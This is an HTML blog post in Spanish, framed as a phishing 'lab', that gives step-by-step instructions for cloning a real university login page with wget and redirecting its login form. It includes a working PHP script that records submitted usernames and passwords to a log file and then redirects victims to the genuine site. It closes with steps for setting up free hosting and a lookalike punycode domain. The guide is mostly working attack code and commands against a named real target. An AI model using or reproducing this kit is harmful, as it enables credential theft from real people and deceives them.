<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset='utf-8'>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/assets/css/style.css?v=">
    <!-- start custom head snippets, customize with your own _includes/head-custom.html file -->

<!-- Setup theme-color -->
<!-- start theme color meta headers -->
<meta name="theme-color" content="#151515">
<meta name="msapplication-navbutton-color" content="#151515">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- end theme color meta headers -->


<!-- Setup Google Analytics -->



<!-- You can set your favicon here -->
<!-- link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" -->

<!-- end custom head snippets -->


<!-- Begin Jekyll SEO tag v2.7.1 -->
<title>Laboratorio de pishing</title>
<meta name="generator" content="Jekyll v3.9.0" />
<meta property="og:title" content="Laboratorio de pishing" />
<meta name="author" content="Fredy Rosero" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Abstract." />
<meta property="og:description" content="Abstract." />
<link rel="canonical" href="http://localhost:4000/laboratorios/2022/05/20/Laboratorio-de-pishing.html" />
<meta property="og:url" content="http://localhost:4000/laboratorios/2022/05/20/Laboratorio-de-pishing.html" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2022-05-20T00:00:00-05:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Laboratorio de pishing" />
<script type="application/ld+json">
{"mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/laboratorios/2022/05/20/Laboratorio-de-pishing.html"},"description":"Abstract.","url":"http://localhost:4000/laboratorios/2022/05/20/Laboratorio-de-pishing.html","@type":"BlogPosting","headline":"Laboratorio de pishing","dateModified":"2022-05-20T00:00:00-05:00","datePublished":"2022-05-20T00:00:00-05:00","author":{"@type":"Person","name":"Fredy Rosero"},"@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->

  </head>

  <body>

    <header>
      <div class="container">
        <a id="a-title" href="/">
          <h1></h1>
        </a>
        <h2></h2>

        <section id="downloads">
          
          <a href="" class="btn btn-github"><span class="icon"></span>View on GitHub</a>
        </section>
      </div>
    </header>

    <div class="container">
      <section id="main_content">
        <small>20 May 2022</small>
<h1>Laboratorio de pishing</h1>

<p class="view">by Fredy Rosero</p>

<p><img src="" alt="thumbnail" /></p>

<p>Abstract.
 <!--more--></p>

<h2 id="prerrequisitos">Prerrequisitos</h2>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>apt <span class="nb">install</span>
</code></pre></div></div>

<h2 id="método-manual">Método manual</h2>

<h3 id="wget">WGet</h3>
<p>-E
–adjust-extension</p>
<blockquote>
  <p>If a file of type application/xhtml+xml or text/html is downloaded and the URL does not end with the regexp .[Hh][Tt][Mm][Ll]?, this option will cause the suffix .html to be appended to the local filename.</p>
</blockquote>

<p>-H
–span-hosts</p>
<blockquote>
  <p>Enable spanning across hosts when doing recursive retrieving.</p>
</blockquote>

<p>-k
–convert-links</p>
<blockquote>
  <p>After the download is complete, convert the links in the document to make them suitable for local  viewing.</p>
</blockquote>

<p>-K
–backup-converted</p>
<blockquote>
  <p>When converting a file, back up the original version with a .orig suffix. Affects the behavior of -N. 
-p
–page-requisites
This option causes Wget to download all the files that are necessary to properly display a given HTML page.</p>
</blockquote>

<p>-nH
–no-host-directories</p>
<blockquote>
  <p>Disable generation of host-prefixed directories.</p>
</blockquote>

<h4 id="descarga-de-página">Descarga de página</h4>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">URL</span><span class="o">=</span>https://micampus.unal.edu.co/
<span class="nv">USER_AGENT</span><span class="o">=</span><span class="s1">'"Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/60.0"'</span>
<span class="nv">WEB_PATH</span><span class="o">=</span><span class="si">$(</span><span class="nb">pwd</span><span class="si">)</span>/web
wget <span class="nt">-E</span> <span class="nt">-H</span> <span class="nt">-k</span> <span class="nt">-K</span> <span class="nt">-p</span> <span class="nt">-nH</span> <span class="nt">--cut-dirs</span><span class="o">=</span>100 <span class="nt">-nv</span> <span class="nv">$URL</span> <span class="nt">--user-agent</span> <span class="nv">$USER_AGENT</span> <span class="nt">--directory-prefix</span><span class="o">=</span><span class="nv">$WEB_PATH</span>
</code></pre></div></div>
<h3 id="indexhtml">Index.html</h3>
<p>Vamos a copiar el archivo <code class="language-plaintext highlighter-rouge">index.html</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">cd </span>web
<span class="nb">cp </span>index.html index.html.bkp
vim index.html
<span class="c"># :q</span>
</code></pre></div></div>

<p>Luego lo formateamos con tidy</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>tidy <span class="nt">-indent</span> <span class="nt">--indent-spaces</span> 2 <span class="nt">--quiet</span> <span class="nt">--tidy-mark</span> no index.html.bkp <span class="o">&gt;</span> index.html
</code></pre></div></div>

<p>Ahora buscamos el formulario de login y cambiamos su atributo <a href="https://developer.mozilla.org/es/docs/Web/HTML/Element/form#attr-action"><code class="language-plaintext highlighter-rouge">action</code></a> a <code class="language-plaintext highlighter-rouge">pish.hp</code> el cual será la URI del programa que procesará la información enviada por medio del formulario.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>vim index.html
<span class="c"># q/i action=</span>
<span class="c"># vi"c</span>
<span class="c"># phish.php</span>
<span class="c"># :w</span>
</code></pre></div></div>

<p>Tambien identificamos el atributo <code class="language-plaintext highlighter-rouge">name</code> de los inputs del mismo formulario</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># q/i name=</span>
<span class="c"># :q</span>
</code></pre></div></div>

<p>Ahora creamos el archivo <code class="language-plaintext highlighter-rouge">phish.php</code> con el comando <code class="language-plaintext highlighter-rouge">vim phish.php</code>, pegamos y el siguiente contenido y salimos con <code class="language-plaintext highlighter-rouge">:wq</code></p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span>
<span class="c1">// Extraer Form data</span>
<span class="nv">$form_data</span> <span class="o">=</span> <span class="nb">file_get_contents</span><span class="p">(</span><span class="s1">'php://input'</span><span class="p">);</span> <span class="c1">// Guardar cuerpo de la petición en un string</span>
<span class="nb">parse_str</span><span class="p">(</span><span class="nv">$form_data</span><span class="p">,</span> <span class="nv">$parsed</span><span class="p">);</span> <span class="c1">// Parsea un string a variables</span>

<span class="c1">// Construimos el mensaje a guardar</span>
<span class="nv">$log</span> <span class="o">=</span> <span class="s2">"=============+=============</span><span class="se">\n</span><span class="s2">"</span><span class="p">;</span>
<span class="nv">$log</span> <span class="mf">.</span><span class="o">=</span> <span class="s2">"Username:	"</span> <span class="mf">.</span> <span class="nv">$parsed</span><span class="p">[</span><span class="s1">'username'</span><span class="p">]</span> <span class="mf">.</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">;</span>
<span class="nv">$log</span> <span class="mf">.</span><span class="o">=</span> <span class="s2">"Password:	"</span> <span class="mf">.</span> <span class="nv">$parsed</span><span class="p">[</span><span class="s1">'password'</span><span class="p">]</span> <span class="mf">.</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">;</span>
<span class="nv">$log</span> <span class="mf">.</span><span class="o">=</span> <span class="s2">"===========================</span><span class="se">\n\n\n</span><span class="s2">"</span><span class="p">;</span>

<span class="c1">// Escribimos en el archivo `log`</span>
<span class="nv">$logpath</span> <span class="o">=</span> <span class="s2">"log"</span><span class="p">;</span>
<span class="nv">$file</span> <span class="o">=</span> <span class="nb">fopen</span><span class="p">(</span><span class="nv">$logpath</span><span class="p">,</span> <span class="s1">'a'</span><span class="p">);</span> <span class="c1">// la opción a (de append) permite abrir para agregar</span>
<span class="nb">fwrite</span><span class="p">(</span><span class="nv">$file</span><span class="p">,</span> <span class="nv">$log</span><span class="p">);</span>
<span class="nb">fclose</span><span class="p">(</span><span class="nv">$file</span><span class="p">);</span>

<span class="c1">// redirection link will be set automatically</span>
<span class="nv">$URL</span> <span class="o">=</span> <span class="s2">"https://micampus.unal.edu.co/"</span><span class="p">;</span>
<span class="nb">header</span><span class="p">(</span><span class="s2">"Location: ${URL}"</span><span class="p">);</span>
<span class="cp">?&gt;</span>
</code></pre></div></div>

<p>Lanzamos el servidor web standalond de php con</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>php <span class="nt">-S</span> 0.0.0.0:8081
</code></pre></div></div>
<h3 id="servidor-web">Servidor web</h3>
<ol>
  <li>Solicitamos un hosting grauito en 000webhost.com</li>
  <li>Definimos el dominio p. ej. <em>i❤️uqbar.ml</em></li>
  <li>Traducimos la url a punycode en <a href="https://www.punycoder.com/">punycoder</a> p. ej. <em>xn–iuqbar-i50d.ml</em></li>
  <li>Creamos un dominio en freenom.com y asignamos la redirección o registro DNS p. ej. <em>http://test-uqbar.000webhostapp.com/</em>. Esto implica verificar el correo</li>
</ol>




  <small>tags: <em>laboratorio</em> - <em>pishing</em></small>


      </section>
    </div>
  </body>
</html>
